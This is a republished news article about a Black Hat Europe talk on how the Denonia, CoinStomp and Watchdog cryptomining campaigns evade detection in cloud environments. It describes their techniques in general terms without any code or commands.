3 Ways Attackers Bypass Cloud Security

  /     /     /  
Publicated : 23/11/2024   Category : security


3 Ways Attackers Bypass Cloud Security


At Black Hat Europe, a security researcher details the main evasion techniques attackers are currently using in the cloud.



BLACK HAT EUROPE 2022 – London -
CoinStomp
.
Watchdog
.
Denonia
.
These cyberattack campaigns are among the most prolific threats today targeting cloud systems — and their ability to evade detection should serve as a cautionary tale of potential threats to come, a security researcher detailed here today.
Recent cloud-focused malware campaigns have demonstrated that adversary groups have intimate knowledge of cloud technologies and their security mechanisms. And not only that, they are using that to their advantage, said Matt Muir, threat intelligence engineer for Cado Security, who shared details on those three campaigns his team has studied.
While the three attack campaigns are all about cryptomining at this point, some of their techniques could be used for more nefarious purposes. And for the most part, these and other attacks Muirs team has seen are exploiting misconfigured cloud settings and other mistakes. That for the most part means defending against them lands in the cloud customer camp, according to Muir.
Realistically for these kinds of attacks, it has more to do with the user than the [cloud] service provider, Muir tells Dark Reading. They are very opportunistic. The majority of attacks we see have more to do with mistakes by the cloud customer, he said.
Perhaps the most interesting development with these attacks is that they are now targeting serverless computing and containers, he said. The ease of which cloud resources can be compromised has made the cloud an easy target, he said in his presentation,
Real-World Detection Evasion Techniques in the Cloud
.
Denonia malware targets AWS Lambda serverless environments in the cloud. We believe its the first publicly disclosed malware sample to target serverless environments, Muir said. While the campaign itself is about cryptomining, the attackers employ some advanced command and control methods that indicate theyre well-studied in cloud technology.
The Denonia attackers employ a protocol that implements DNS over HTTPS (aka DoH), which sends DNS queries over HTTPS to DoH-based resolver servers. That gives the attackers a way to hide within encrypted traffic such that AWS cant view their malicious DNS lookups. Its not the first malware making use of DoH, but it certainly isnt a common occurrence, Muir said. This prevents the malware to trigger an alert with AWS, he said.
The attackers also appeared to have tossed in more diversions to distract or confuse security analysts, thousands of lines of user agent HTTPS request strings.
At first we thought it was might be a botnet or DDoS ... but in our analysis it was not actually used by malware and instead was a way to pad the binary in order to evade endpoint detection & response (EDR) tools and malware analysis, he said.
CoinStomp is cloud-native malware targeting cloud security providers in Asia for cryptojacking purposes. Its main
modus operandi
is timestamp manipulation as an anti-forensics technique, as well as removing system cryptographic policies. It also uses a C2 family based on a dev/tcp reverse shell to blend into cloud systems Unix environments.
Watchdog
, meanwhile, has been around since 2019 and is one of the more prominent cloud-focused threat groups, Muir noted. They are opportunistic in exploiting cloud misconfiguration, [detecting those mistakes] by mass scanning.
The attackers also rely on old-school steganography to evade detection, hiding their malware behind image files.
Were at an interesting point in cloud malware research, Muir concluded. Campaigns still are lacking somewhat in technicality, which is good news for defenders.
But theres more to come. Threat actors are becoming more sophisticated and likely will move from cryptomining to more damaging attacks, according to Muir.

Last News

▸ Nigerian scammers now turning into mediocre malware pushers. ◂
Discovered: 23/12/2024
Category: security

▸ Beware EMV may not fully protect against skilled thieves. ◂
Discovered: 23/12/2024
Category: security

▸ Hack Your Hotel Room ◂
Discovered: 23/12/2024
Category: security


Cyber Security Categories
Google Dorks Database
Exploits Vulnerability
Exploit Shellcodes

CVE List
Tools/Apps
News/Aarticles

Phishing Database
Deepfake Detection
Trends/Statistics & Live Infos



Tags:
3 Ways Attackers Bypass Cloud Security